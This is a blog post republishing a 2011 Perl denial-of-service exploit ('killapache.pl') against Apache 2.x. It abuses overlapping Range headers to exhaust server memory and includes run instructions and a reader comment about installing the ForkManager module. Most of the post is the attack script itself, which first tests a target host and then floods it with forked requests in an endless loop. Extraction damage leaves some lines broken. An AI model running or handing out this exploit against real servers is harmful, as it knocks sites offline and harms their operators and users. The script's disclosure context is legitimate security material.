Apache (web server) killer
Republishing, as a matter of interest to System Administrators, an exploit made public by Kingcope on saturday, august 20 2011; This exploit will result in swapping memory to filesystem on the remote side, plus killing of processes when running out of swap space, with the remote system becoming unstable.
This exploit has been tested by members of Full Disclosure against Apache 2.x, and is reported to work. There are no patches for the exploit at the moment, other than a series of untested mod rewrite rules.
It works by exploiting Apache’s weak Range handling, making the server allocate memory that is never used nor freed, until the system becomes unstable.
Code, in Perl, is as follows; Copy, paste, save as “killapache.pl”, and run with “perl killapache.pl [host] [numforks]“, to test your own web server(s).
#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#
use IO::Socket;
use Parallel::ForkManager;
sub usage {
print "Apache Remote Denial of Service (memory exhaustion)\n";
print "by Kingcope\n";
print "usage: perl killapache.pl [numforks]\n";
print "example: perl killapache.pl www.example.com 50\n";
}
sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";
$pm = new Parallel::ForkManager($numforks);
$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) {
$p .= ",5-$k";
}
for ($k=0;$kstart and next;
$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto => 'tcp');
$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;
while() {
}
$pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}
sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto => 'tcp');
$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;
$x = ;
if ($x =~ /Partial/) {
print "host seems vuln\n";
return 1;
} else {
return 0;
}
}
if ($#ARGV 1) {
$numforks = $ARGV[1];
} else {$numforks = 50;}
$v = testapache();
if ($v == 0) {
print "Host does not seem vulnerable\n";
exit;
}
while(1) {
killapache();
}
C:\Perl>perl killapache.pl
Can’t locate Parallel/ForkManager.pm in @INC (@INC contains: C:/Perl/site/lib C:
/Perl/lib .) at killapache.pl line 11.
BEGIN failed–compilation aborted at killapache.pl line 11.
whats that mean? that means it doesn’t work right?
That means you do not have the Fork Manager Perl module.
Type in the prompt,
perl -MCPAN -e shell
Answer all questions if it is the first time you run it, then type
install Parallel::ForkManager
It will download, compile and install the module. Now type
exit
And try running the script again. This module basically handles all parallel requests to the web server.